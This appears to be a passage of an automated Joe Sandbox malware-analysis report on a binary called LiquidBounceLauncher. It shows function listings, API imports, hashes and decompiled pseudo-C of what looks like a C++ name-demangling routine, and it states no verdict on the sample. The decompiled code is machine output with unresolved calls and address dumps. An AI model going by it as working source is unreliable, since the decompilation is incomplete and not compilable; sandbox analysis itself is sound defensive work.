                                                                                                                                                                                      control_flow_graph 1202 4af900-4af90a 1203 4af90c 1202->1203 1204 4af911-4af91b malloc 1202->1204 1203->1204 1205 4af91d-4af921 1204->1205 1206 4af922-4af929 call 4a8f30 1204->1206 1209 4af92b-4af92d 1206->1209 1210 4af92f-4af96b call 4afa20 call 4b00d0 1206->1210 1209->1204 1216 4af96d 1210->1216 1217 4af972-4af97e malloc 1210->1217 1216->1217 1218 4af990-4af997 call 4a8f30 1217->1218 1219 4af980-4af987 1217->1219 1218->1219 1222 4af999-4af99b 1218->1222 1222->1217
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                      • String ID: 0rJ
                                                                                                                                                                                      • API String ID: 2803490479-1344966520
                                                                                                                                                                                      • Opcode ID: 246ae26b585d25db41701332fbd545a89043bb3598be781900019f8724971dbd
                                                                                                                                                                                      • Instruction ID: e1d26253acc722468eaa17cb866e5ff54cb41cabe0106fb106a9fc649663e5d9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 246ae26b585d25db41701332fbd545a89043bb3598be781900019f8724971dbd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C0171F06183016ADB107BE5598175B65989F76388F41483FED848B302EB7CC948876A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004292C0 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1224 4292c0-4292e1 FindNextFileA 1225 429342-42934a GetLastError 1224->1225 1226 4292e3-4292ee 1224->1226 1227 42931e-429328 1225->1227 1228 42934c-429361 _errno 1225->1228 1229 429302-42930e 1226->1229 1230 4292f0-4292ff 1229->1230 1231 429310-429319 1229->1231 1230->1229 1232 429330-429341 1231->1232 1233 42931b 1231->1233 1233->1227
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFileFindLastNext_errno
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2804278807-0
                                                                                                                                                                                      • Opcode ID: 7cfe841b90e4922a52334382e8c7b15fe9c7ddb5546ac9d10c18a24a9ef10097
                                                                                                                                                                                      • Instruction ID: 661d0c65ffbefe69472837bfbce119437177ed822c625fe4e1eb21dc1f5824df
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cfe841b90e4922a52334382e8c7b15fe9c7ddb5546ac9d10c18a24a9ef10097
                                                                                                                                                                                      • Instruction Fuzzy Hash: E30165716042608BDF50DF69BC812A6B7A0EB45315F89887BEC94CE386E13DC849C3A5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00429580 Relevance: 4.5, APIs: 3, Instructions: 21COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindClose.KERNEL32(?,?,?,?,?,00428A0B), ref: 00429595
                                                                                                                                                                                      • free.MSVCRT(?,?,?,?,?,?,00428A0B), ref: 004295A4
                                                                                                                                                                                      • _errno.MSVCRT ref: 004295B0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseFind_errnofree
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1660445202-0
                                                                                                                                                                                      • Opcode ID: 441ba031dc975d3c37c690e2cc3b60cbc3454b32681044380269ab40b0034261
                                                                                                                                                                                      • Instruction ID: 1165faa35053dde6aa1c68680eb35e262c2de973df3312f7985ee01eb4cafa31
                                                                                                                                                                                      • Opcode Fuzzy Hash: 441ba031dc975d3c37c690e2cc3b60cbc3454b32681044380269ab40b0034261
                                                                                                                                                                                      • Instruction Fuzzy Hash: BBE04FB17002109BC7013EB5A88262A36A46F04314FD00A7EED504B38BEB3CC884879A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0040146E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 61memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • basic_string::_M_construct null not valid, xrefs: 004014E3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID: basic_string::_M_construct null not valid
                                                                                                                                                                                      • API String ID: 4275171209-3522614731
                                                                                                                                                                                      • Opcode ID: 6cc05bd5d9ca1f3232f0b9b0a5e85035bc5f07d35fe151b315f91c60fbedb896
                                                                                                                                                                                      • Instruction ID: f1cee425e70b2bbf4e893aca39d5a8278bb497affb5fd015458e8372fea0df6b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cc05bd5d9ca1f3232f0b9b0a5e85035bc5f07d35fe151b315f91c60fbedb896
                                                                                                                                                                                      • Instruction Fuzzy Hash: FF116AB09043049FCB00EF69C48166EBBF8EF89314F40846EE9989B395E778D845CB96
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004012E0 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 004012EA
                                                                                                                                                                                        • Part of subcall function 004011B0: SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,004012F5), ref: 004011E3
                                                                                                                                                                                        • Part of subcall function 004011B0: _setmode.MSVCRT ref: 00401220
                                                                                                                                                                                        • Part of subcall function 004011B0: _setmode.MSVCRT ref: 00401234
                                                                                                                                                                                        • Part of subcall function 004011B0: _setmode.MSVCRT ref: 00401248
                                                                                                                                                                                        • Part of subcall function 004011B0: __p__fmode.MSVCRT ref: 0040124D
                                                                                                                                                                                        • Part of subcall function 004011B0: __p__environ.MSVCRT ref: 00401267
                                                                                                                                                                                        • Part of subcall function 004011B0: _cexit.MSVCRT ref: 0040128A
                                                                                                                                                                                        • Part of subcall function 004011B0: ExitProcess.KERNEL32(?,?,?,?,?,004012F5), ref: 00401292
                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 0040130A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _setmode$__set_app_type$ExceptionExitFilterProcessUnhandled__p__environ__p__fmode_cexit
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2461648636-0
                                                                                                                                                                                      • Opcode ID: ef1a456377fff7f18a8de650fa1b998d1b5dacf5ab6ff6ab62e215fd955721af
                                                                                                                                                                                      • Instruction ID: e52980be0805b68a2b3ae0d828d7bc6261d6a886615ea8dd40c328212e5420b1
                                                                                                                                                                                      • Opcode Fuzzy Hash: ef1a456377fff7f18a8de650fa1b998d1b5dacf5ab6ff6ab62e215fd955721af
                                                                                                                                                                                      • Instruction Fuzzy Hash: D1D042314146128BC704BF68C809399BBB4BB04308F464A2CE5A92B062D7B9355A8BE6
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0042B2D0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: bd5daf321b857766ad2d9d3cd1be15eb308d8f8412a232f7b019fe335b850ca8
                                                                                                                                                                                      • Instruction ID: 96fbf08ef4f6eaa5711ff5b476d070d97f5ba173f33df13450c426c79247f0af
                                                                                                                                                                                      • Opcode Fuzzy Hash: bd5daf321b857766ad2d9d3cd1be15eb308d8f8412a232f7b019fe335b850ca8
                                                                                                                                                                                      • Instruction Fuzzy Hash: F0F0E2B0A012068FC71CDF15D491629B7A1FFA8314F48649EDA450B382D339EDD1DBD5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00431760 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: fwrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3559309478-0
                                                                                                                                                                                      • Opcode ID: 33579abf34653b2a8d45757c3e979624fc9d68c6b05e62789373f5a915621bd8
                                                                                                                                                                                      • Instruction ID: cb9233cce80a656ddfcfa4f39e23eb17018fffeadd57b52153805545cb7d3d0e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 33579abf34653b2a8d45757c3e979624fc9d68c6b05e62789373f5a915621bd8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 60D067B49083009FC340EF19D14160ABBE0BB98708F40896DE8C897302E235D5548F12
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004014EF Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                      • Opcode ID: 556958dfd1c19cc63e269430532686653b3cc7e53bbfdbfbebc213fa2837ae9b
                                                                                                                                                                                      • Instruction ID: cc560c6f9be89af693f09b36aeb93b3d8c979c847737b468e076b971595e3ecb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 556958dfd1c19cc63e269430532686653b3cc7e53bbfdbfbebc213fa2837ae9b
                                                                                                                                                                                      • Instruction Fuzzy Hash: C8D0C9B0108300AAE300BF29D10A70ABAE49B4034DF80C85DE6D41B286E7BDD4488B97
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                      Function 0041F2B0 Relevance: 13.8, APIs: 3, Strings: 6, Instructions: 328stringCOMMONCrypto
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      C-Code - Quality: 52%
                                                                                                                                                                                      			E0041F2B0(signed char* __eax, intOrPtr __ecx, signed int __edx) {
				void* _v16;
				char _v32;
				signed int _v36;
				char _v40;
				char* _v44;
				signed int _v48;
				char _v52;
				char* _v56;
				signed int* _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v100;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				signed int _v380;
				char _v384;
				char* _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed char* _v404;
				signed char _v408;
				intOrPtr _v412;
				char _v416;
				intOrPtr _v420;
				signed int _v424;
				signed int _v432;
				signed int _v436;
				intOrPtr _v440;
				signed int _v444;
				signed int _v448;
				void* _v461;
				char _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				signed int _t163;
				signed int _t165;
				void* _t170;
				signed int _t172;
				signed int _t182;
				intOrPtr _t202;
				signed int _t206;
				signed int _t207;
				intOrPtr* _t208;
				signed int _t210;
				signed int _t214;
				int _t219;
				signed int _t221;
				signed int _t225;
				signed int _t226;
				signed char* _t229;
				signed int _t231;
				signed char* _t233;
				intOrPtr _t234;
				signed int _t238;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed char* _t262;
				signed int _t264;
				intOrPtr _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				char* _t280;
				signed int _t282;
				signed char* _t285;
				signed char* _t286;
				void* _t288;
				void* _t289;
				intOrPtr* _t290;
				intOrPtr* _t292;
				void* _t298;
				void* _t304;

				_t254 = __edx;
				_t229 = __eax;
				_t290 = _t289 - 0x1cc;
				_t163 =  *__eax & 0x000000ff;
				_v436 = __edx;
				_v440 = __ecx;
				_t298 = _t163 - 0x5f;
				_v432 = _t163;
				if(_t298 == 0) {
					_t278 = 1;
					if(__eax[1] != 0x5a) {
						goto L1;
					} else {
					}
				} else {
					L1:
					asm("repe cmpsb");
					_t238 = 0 | _t298 > 0x00000000;
					_t278 = 0;
					if(_t238 == (_t163 & 0xffffff00 | _t298 > 0x00000000)) {
						_t225 =  *(_t229 + 8) & 0x000000ff;
						if((_t254 & 0xffffff00 | _t225 == 0x0000002e | _t238 & 0xffffff00 | _t225 == 0x0000005f) != 0 || _t225 == 0x24) {
							_t226 =  *(_t229 + 9) & 0x000000ff;
							if(_t226 == 0x44) {
								L17:
								_t278 = 0;
								if( *((char*)(_t229 + 0xa)) == 0x5f) {
									_t278 = ((_t226 & 0xffffff00 | _t226 != 0x00000049) & 0x000000ff) + 2;
								}
							} else {
								_t278 = 0;
								if(_t226 == 0x49) {
									goto L17;
								}
							}
						}
					}
				}
				 *_t290 = _t229;
				_t165 = strlen(??);
				_t272 = _t165 + _t165;
				_v380 = _t165;
				_v416 = _t229;
				_v408 = 0x11;
				_v412 = _t229 + _t165;
				_t240 = _t165 * 4;
				_v404 = _t229;
				_v392 = _t272;
				_v396 = 0;
				_v384 = 0;
				_v376 = 0;
				_v372 = 0;
				_v368 = 0;
				_v364 = 0;
				_v360 = 0;
				_t170 = E00420510(0x12 + (_t165 * 4 + _t272) * 4 >> 4 << 4);
				_t172 =  &_v461 >> 2;
				_v444 = _t172;
				_t255 = _t172 * 4;
				_t292 = _t290 - _t170 - E00420510(0x12 + _t165 * 4 >> 4 << 4);
				_t304 = _t278 - 1;
				_v400 = _t255;
				_v388 =  &_v464;
				if(_t304 == 0) {
					if(_v432 == 0x5f) {
						if( *((char*)(_t229 + 1)) != 0x5a) {
							goto L22;
						} else {
							_t273 =  &_v416;
							_v404 = _t229 + 2;
							_v432 = E004192E0(_t273, 1);
							if((_v408 & 0x00000001) == 0) {
								_t182 =  *_v404 & 0x000000ff;
							} else {
								_t262 = _v404;
								_t182 =  *_t262 & 0x000000ff;
								if(_t182 == 0x2e) {
									_v444 = _t273;
									do {
										_t206 = _t262[1] & 0x000000ff;
										_t123 = _t206 - 0x61; // -7
										if(_t123 <= 0x19 || _t206 == 0x5f) {
											_t207 = _t262[2] & 0x000000ff;
											_t233 =  &(_t262[2]);
											while(_t207 - 0x61 <= 0x19) {
												L52:
												_t233 =  &(_t233[1]);
												_t207 =  *_t233 & 0x000000ff;
											}
											if(_t207 == 0x5f) {
												goto L52;
											}
											goto L31;
										} else {
											_t182 =  *_t262 & 0x000000ff;
											if(_t206 - 0x30 <= 9) {
												_t233 = _t262;
												L31:
												while(_t207 == 0x2e) {
													while((_t233[1] & 0x000000ff) - 0x30 <= 9) {
														_t207 = _t233[2] & 0x000000ff;
														_t233 =  &(_t233[2]);
														if(_t207 - 0x30 > 9) {
															goto L31;
														} else {
															do {
																_t233 =  &(_t233[1]);
																_t214 =  *_t233 & 0x000000ff;
															} while (_t214 - 0x30 <= 9);
															if(_t214 == 0x2e) {
																continue;
															}
														}
														goto L38;
													}
													break;
												}
												L38:
												_t282 = _v396;
												_v404 = _t233;
												if(_t282 >= _v392) {
													L49:
													_t208 = 0;
												} else {
													_t234 = _t233 - _t262;
													_v396 = _t282 + 1;
													_t208 = _v400 + (_t282 + _t282 * 2) * 4;
													if(_t234 == 0 || _t208 == 0) {
														goto L49;
													} else {
														 *_t208 = 0;
														 *(_t208 + 4) = _t262;
														 *((intOrPtr*)(_t208 + 8)) = _t234;
													}
												}
												goto L42;
											}
										}
										goto L12;
										L42:
										 *_t292 = _t208;
										_t210 = E004164E0(_v432, 0x4d);
										_t262 = _v404;
										_v432 = _t210;
										_t182 =  *_t262 & 0x000000ff;
									} while (_t182 == 0x2e);
								}
							}
							goto L12;
						}
					} else {
						goto L22;
					}
				} else {
					if(_t304 < 0 || _t278 > 3) {
						_v432 = E00418320( &_v416, _t240);
						_t182 =  *_v404 & 0x000000ff;
					} else {
						_t250 = _t229 + 0xb;
						_v404 = _t250;
						if( *((char*)(_t229 + 0xb)) == 0x5f) {
							if( *((char*)(_t229 + 0xc)) != 0x5a) {
								goto L8;
							} else {
								_v404 = _t229 + 0xd;
								_t252 = E004192E0( &_v416, 0);
								goto L11;
							}
							goto L55;
						} else {
							L8:
							_v448 = _t255;
							 *_t292 = _t250;
							_v432 = _t250;
							_t219 = strlen(??);
							_t251 = _v432;
							_t264 = _v448;
							if(_t272 <= 0) {
								L10:
								_t252 = 0;
							} else {
								_v396 = 1;
								if(_t219 != 0) {
									_t277 = _v444;
									 *((intOrPtr*)(4 + _t277 * 4)) = _t251;
									 *(_t277 * 4) = 0;
									_t252 = _t264;
									 *(8 + _t277 * 4) = _t219;
								} else {
									goto L10;
								}
							}
						}
						L11:
						 *_t292 = 0;
						_t221 = E004164E0(_t252, (0 | _t278 != 0x00000002) + 0x43);
						_t285 = _v404;
						_v432 = _t221;
						 *_t292 = _t285;
						_t286 = _t285 + strlen(??);
						_v404 = _t286;
						_t182 =  *_t286 & 0x000000ff;
					}
					L12:
					_t231 = _v432;
					if(_t231 == 0 || _t182 != 0) {
						L22:
						return 0;
					} else {
						_v100 = 0;
						_v96 = 0;
						_t280 =  &_v356;
						_v84 = 0;
						_v80 = 0;
						_v92 = _v436;
						_v68 = 0;
						_v64 = 0;
						_v76 = 0;
						_v72 = 0;
						_v88 = _v440;
						_v60 = 0;
						_v56 = 0;
						_v52 = 0;
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						E004166D0( &_v36, _t231,  &_v48);
						_v32 = 0;
						_v36 = _v36 * _v48;
						E00420510(0x12 + _v48 * 8 >> 4 << 4);
						E00420510(0x12 + _v36 * _v48 * 8 >> 4 << 4);
						_v56 =  &_v464;
						_v424 = _t231;
						_v44 =  &_v464;
						_v420 = _v60;
						_v60 =  &_v424;
						L00419A80(_t280, _t231, 0x11);
						_v60 = _v420;
						_t202 = _v100;
						 *((char*)(_t288 + _t202 - 0x160)) = 0;
						_v472 = _t202;
						_v468 = _v88;
						 *_t292 = _t280;
						_v92();
						return 0 | _v76 == 0x00000000;
					}
				}
				L55:
			}


























































































                                                                                                                                                                                      0x0041f2b0
                                                                                                                                                                                      0x0041f2b6
                                                                                                                                                                                      0x0041f2b8
                                                                                                                                                                                      0x0041f2be
                                                                                                                                                                                      0x0041f2c1
                                                                                                                                                                                      0x0041f2c7
                                                                                                                                                                                      0x0041f2cd
                                                                                                                                                                                      0x0041f2cf
                                                                                                                                                                                      0x0041f2d5
                                                                                                                                                                                      0x0041f601
                                                                                                                                                                                      0x0041f606
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f60c
                                                                                                                                                                                      0x0041f2db
                                                                                                                                                                                      0x0041f2db
                                                                                                                                                                                      0x0041f2e7
                                                                                                                                                                                      0x0041f2e9
                                                                                                                                                                                      0x0041f2ef
                                                                                                                                                                                      0x0041f2f3
                                                                                                                                                                                      0x0041f2f5
                                                                                                                                                                                      0x0041f305
                                                                                                                                                                                      0x0041f5cd
                                                                                                                                                                                      0x0041f5d3
                                                                                                                                                                                      0x0041f5df
                                                                                                                                                                                      0x0041f5df
                                                                                                                                                                                      0x0041f5e5
                                                                                                                                                                                      0x0041f5f5
                                                                                                                                                                                      0x0041f5f5
                                                                                                                                                                                      0x0041f5d5
                                                                                                                                                                                      0x0041f5d5
                                                                                                                                                                                      0x0041f5d9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041f5d9
                                                                                                                                                                                      0x0041f5d3
                                                                                                                                                                                      0x0041f305
                                                                                                                                                                                      0x0041f2f3
                                                                                                                                                                                      0x0041f313
                                                                                                                                                                                      0x0041f316
                                                                                                                                                                                      0x0041f31e
                                                                                                                                                                                      0x0041f321
                                                                                                                                                                                      0x0041f327
                                                                                                                                                                                      0x0041f32d
                                                                                                                                                                                      0x0041f337
                                                                                                                                                                                      0x0041f33d
                                                                                                                                                                                      0x0041f344
                                                                                                                                                                                      0x0041f34a
                                                                                                                                                                                      0x0041f350
                                                                                                                                                                                      0x0041f35d
                                                                                                                                                                                      0x0041f367
                                                                                                                                                                                      0x0041f371
                                                                                                                                                                                      0x0041f37b
                                                                                                                                                                                      0x0041f38c
                                                                                                                                                                                      0x0041f396
                                                                                                                                                                                      0x0041f3a6
                                                                                                                                                                                      0x0041f3b1
                                                                                                                                                                                      0x0041f3b4
